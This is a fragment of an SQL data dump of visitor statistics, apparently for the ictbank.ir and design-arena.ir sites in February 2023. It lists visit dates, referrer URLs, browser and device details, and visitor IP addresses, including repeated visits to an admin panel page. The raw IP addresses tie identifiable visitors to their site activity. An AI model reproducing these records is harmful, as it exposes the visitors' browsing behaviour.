(28742,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(28743,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.108.242.241','000',0,2,0),
(28744,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','65.108.88.104','000',0,1,0),
(28745,'2023-02-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28746,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,9,0),
(28747,'2023-02-11','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.196','000',0,1,0),
(28748,'2023-02-11','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.233','000',0,1,0),
(28749,'2023-02-11','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.205','000',0,1,0),
(28750,'2023-02-11','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.187','000',0,1,0),
(28751,'2023-02-11','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(28752,'2023-02-11','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.8','000',0,1,0),
(28753,'2023-02-11','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(28754,'2023-02-11','https://ictbank.ir/blog','Firefox','OS X','32.0','desktop','Macintosh','','148.153.45.234','000',0,4,0),
(28755,'2023-02-11','https://www.google.com/','Edge','Windows','109.0.0.0','desktop','Unknown','','151.36.166.98','000',0,1,0),
(28756,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.94.152','000',0,1,0),
(28757,'2023-02-11','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.229.104.2','000',0,1,0),
(28758,'2023-02-11','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','39.119.236.124','000',0,1,0),
(28759,'2023-02-11','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.238.41.207','000',0,74,0),
(28760,'2023-02-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28761,'2023-02-11','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','187.161.106.138','000',0,1,0),
(28762,'2023-02-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(28763,'2023-02-11','http://www.bing.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','81.19.135.24','000',0,16,0),
(28764,'2023-02-11','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.242','000',0,2,0),
(28765,'2023-02-12','https://ictbank.ir/blog','Chrome','Android','63.0.0.0','mobile:smart','Unknown','','193.37.254.170','000',0,1,0),
(28766,'2023-02-12','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','185.147.34.146','000',0,1,0),
(28767,'2023-02-12','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','15.235.12.96','000',0,2,0),
(28768,'2023-02-12','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(28769,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','194.169.160.62','000',0,1,0),
(28770,'2023-02-12','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28771,'2023-02-12','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(28772,'2023-02-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','143.244.184.204','000',0,1,0),
(28773,'2023-02-12','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.231.161.235','000',0,1,0),
(28774,'2023-02-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28775,'2023-02-12','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','37.29.41.251','000',0,1,0),
(28776,'2023-02-12','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28777,'2023-02-12','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28778,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.71.206.94','000',0,1,0),
(28779,'2023-02-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28780,'2023-02-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28781,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','37.139.179.19','000',0,3,0),
(28782,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(28783,'2023-02-12','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','34.207.151.207','000',0,1,0),
(28784,'2023-02-12','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.82.39.43','000',0,1,0),
(28785,'2023-02-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(28786,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','86.0.0.0','desktop','Unknown','','52.250.30.131','000',0,2,0),
(28787,'2023-02-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(28788,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(28789,'2023-02-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.170.144.195','000',0,1,0),
(28790,'2023-02-12','https://ictbank.ir/blog','Chrome','Linux','96.0.0.0','desktop','Unknown','','107.172.80.79','000',0,1,0),
(28791,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.147','000',0,1,0),
(28792,'2023-02-12','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.224','000',0,1,0),
(28793,'2023-02-12','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.231','000',0,1,0),
(28794,'2023-02-12','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.251.77','000',0,2,0),
(28795,'2023-02-12','https://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','5.238.182.245','000',0,1,0),
(28796,'2023-02-12','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','54.158.170.37','000',0,1,0),
(28797,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','159.223.152.0','000',0,1,0),
(28798,'2023-02-13','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,4,0),
(28799,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.106.249.142','000',0,1,0),
(28800,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.68.11.227','000',0,2,0),
(28801,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','148.72.232.34','000',0,1,0),
(28802,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','159.89.182.223','000',0,1,0),
(28803,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','147.50.227.60','000',0,1,0),
(28804,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.68.11.231','000',0,1,0),
(28805,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','182.50.151.67','000',0,1,0),
(28806,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','195.181.248.41','000',0,1,0),
(28807,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','93.89.225.28','000',0,1,0),
(28808,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','13.84.45.238','000',0,1,0),
(28809,'2023-02-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(28810,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','75.102.23.38','000',0,1,0),
(28811,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','46.235.40.119','000',0,1,0),
(28812,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','47.89.252.117','000',0,1,0),
(28813,'2023-02-13','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(28814,'2023-02-13','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','103.251.167.20','000',0,1,0),
(28815,'2023-02-13','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','82.221.131.5','000',0,1,0),
(28816,'2023-02-13','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','192.42.116.197','000',0,1,0),
(28817,'2023-02-13','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','192.42.116.24','000',0,1,0),
(28818,'2023-02-13','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.246.188.73','000',0,3,0),
(28819,'2023-02-13','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(28820,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28821,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','52.2.61.86','000',0,27,0),
(28822,'2023-02-13','http://ictbank.ir','Chrome','OS X','87.0.0.0','desktop','Macintosh','','18.144.10.19','000',0,2,0),
(28823,'2023-02-13','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.144.147.66','000',0,2,0),
(28824,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.56.203','000',0,1,0),
(28825,'2023-02-13','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','31.59.61.20','000',0,73,0),
(28826,'2023-02-13','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','51.255.196.88','000',0,2,0),
(28827,'2023-02-13','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.238.106.235','000',0,112,0),
(28828,'2023-02-13','https://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','185.123.240.150','000',0,1,0),
(28829,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.135.185','000',0,2,0),
(28830,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.147.97','000',0,1,0),
(28831,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(28832,'2023-02-13','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','77.92.230.25','000',0,1,0),
(28833,'2023-02-13','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','37.179.173.133','000',0,1,0),
(28834,'2023-02-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.170.144.195','000',0,2,0),
(28835,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','192.169.150.120','000',0,1,0),
(28836,'2023-02-13','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','213.152.250.204','000',0,2,0),
(28837,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.123.240.54','000',0,2,0),
(28838,'2023-02-13','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','5.238.207.207','000',0,6,0),
(28839,'2023-02-13','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','103.225.85.182','000',0,15,0),
(28840,'2023-02-13','https://ictbank.ir/blog','Chrome','Android','76.0.0.0','mobile:smart','Redmi Y2','','40.113.160.8','000',0,1,0),
(28841,'2023-02-13','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28842,'2023-02-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.55','000',0,2,0),
(28843,'2023-02-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(28844,'2023-02-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.131.198','000',0,1,0),
(28845,'2023-02-14','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(28846,'2023-02-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,9,0),
(28847,'2023-02-14','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,15,0),
(28848,'2023-02-14','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(28849,'2023-02-14','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','159.65.44.109','000',0,1,0),
(28850,'2023-02-14','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,4,0),
(28851,'2023-02-14','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','178.214.253.230','000',0,1,0),
(28852,'2023-02-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28853,'2023-02-14','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(28854,'2023-02-14','https://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','74.0.0.0','desktop','Unknown','','116.50.59.202','000',0,1,0),
(28855,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.86.35','000',0,10,0),
(28856,'2023-02-14','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,1,0),
(28857,'2023-02-14','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','114.108.148.220','000',0,1,0),
(28858,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.149.21','000',0,1,0),
(28859,'2023-02-14','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','175.107.239.31','000',0,1,0),
(28860,'2023-02-14','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(28861,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.110.188','000',0,1,0),
(28862,'2023-02-14','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','178.249.156.86','000',0,1,0),
(28863,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.86.107.123','000',0,1,0),
(28864,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(28865,'2023-02-14','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(28866,'2023-02-14','https://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','171.13.14.39','000',0,1,0),
(28867,'2023-02-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(28868,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,1,0),
(28869,'2023-02-14','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28870,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.55.51','000',0,1,0),
(28871,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','157.230.130.85','000',0,1,0),
(28872,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','198.71.227.19','000',0,1,0),
(28873,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','94.23.36.102','000',0,1,0),
(28874,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','50.62.177.118','000',0,1,0),
(28875,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','93.188.2.5','000',0,1,0),
(28876,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','46.165.166.206','000',0,1,0),
(28877,'2023-02-14','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.238.36.129','000',0,7,0),
(28878,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','209.17.114.78','000',0,1,0),
(28879,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','103.247.62.133','000',0,1,0),
(28880,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','198.71.228.43','000',0,1,0),
(28881,'2023-02-14','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','82.26.27.43','000',0,1,0),
(28882,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(28883,'2023-02-14','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.41','000',0,1,0),
(28884,'2023-02-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(28885,'2023-02-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28886,'2023-02-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.102.176','000',0,1,0),
(28887,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','192.241.154.86','000',0,3,0),
(28888,'2023-02-14','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(28889,'2023-02-14','https://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(28890,'2023-02-14','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(28891,'2023-02-14','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(28892,'2023-02-14','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,3,0),
(28893,'2023-02-14','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(28894,'2023-02-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','92.205.25.182','000',0,1,0),
(28895,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,1,0),
(28896,'2023-02-14','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,3,0),
(28897,'2023-02-14','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28898,'2023-02-14','https://45.92.94.221:443/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','34.239.159.98','000',0,11,0),
(28899,'2023-02-14','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','104.236.65.231','000',0,1,0),
(28900,'2023-02-14','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.50','000',0,1,0),
(28901,'2023-02-14','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.24','000',0,1,0),
(28902,'2023-02-14','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.213','000',0,1,0),
(28903,'2023-02-14','https://45.92.94.221/blog','BlackBerry Browser','BlackBerry OS','Unknown','mobile:smart','BlackBerry Curve 8320','','45.76.43.3','000',0,2,0),
(28904,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,5,0),
(28905,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','69.171.251.19','000',0,1,0),
(28906,'2023-02-15','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','20.203.221.49','000',0,1,0),
(28907,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','213.170.70.213','000',0,1,0),
(28908,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','192.155.81.224','000',0,3,0),
(28909,'2023-02-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28910,'2023-02-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28911,'2023-02-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28912,'2023-02-15','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(28913,'2023-02-15','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','159.65.239.34','000',0,1,0),
(28914,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.236.193.192','000',0,1,0),
(28915,'2023-02-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(28916,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,4,0),
(28917,'2023-02-15','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(28918,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,3,0),
(28919,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','148.72.211.24','000',0,3,0),
(28920,'2023-02-15','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','159.65.13.179','000',0,1,0),
(28921,'2023-02-15','http://ictbank.ir/','Edge','Windows','110.0.0.0','desktop','Unknown','','161.69.71.25','000',0,1,0),
(28922,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.213.207.7','000',0,1,0),
(28923,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,4,0),
(28924,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.43','000',0,2,0),
(28925,'2023-02-15','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.226','000',0,2,0),
(28926,'2023-02-15','https://www.google.com/','Chrome','OS X','110.0.0.0','desktop','Macintosh','','2.106.107.174','000',0,1,0),
(28927,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,6,0),
(28928,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.221','000',0,1,0),
(28929,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','188.161.202.176','000',0,1,0),
(28930,'2023-02-15','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.13','000',0,1,0),
(28931,'2023-02-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.164','000',0,1,0),
(28932,'2023-02-15','http://ictbank.ir','Safari','iOS','11.0','mobile:smart','iPhone','','192.42.116.174','000',0,1,0),
(28933,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.188.56.41','000',0,1,0),
(28934,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.27','000',0,3,0),
(28935,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,3,0),
(28936,'2023-02-15','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.183.122.143','000',0,1,0),
(28937,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','37.139.179.19','000',0,5,0),
(28938,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.149.21','000',0,1,0),
(28939,'2023-02-15','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28940,'2023-02-15','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,2,0),
(28941,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,1,0),
(28942,'2023-02-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,3,0),
(28943,'2023-02-15','https://ictbank.ir/blog','Safari','iOS','12.0.0','mobile:smart','iPhone','','50.31.21.6','000',0,2,0),
(28944,'2023-02-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.16','000',0,1,0),
(28945,'2023-02-15','https://45.92.94.221:443/blog','Firefox','Windows','83.0','desktop','Unknown','','132.145.98.101','000',0,10,0),
(28946,'2023-02-15','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','195.216.210.193','000',0,1,0),
(28947,'2023-02-15','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.202.77.24','000',0,1,0),
(28948,'2023-02-15','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.109','000',0,1,0),
(28949,'2023-02-15','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.114','000',0,1,0),
(28950,'2023-02-15','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','128.1.137.55','000',0,2,0),
(28951,'2023-02-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(28952,'2023-02-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','45.76.150.144','000',0,1,0),
(28953,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','3.139.59.202','000',0,1,0),
(28954,'2023-02-16','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.8','000',0,2,0),
(28955,'2023-02-16','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(28956,'2023-02-16','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Pixel','','139.99.123.180','000',0,42,0),
(28957,'2023-02-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(28958,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(28959,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','188.165.33.50','000',0,2,0),
(28960,'2023-02-16','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
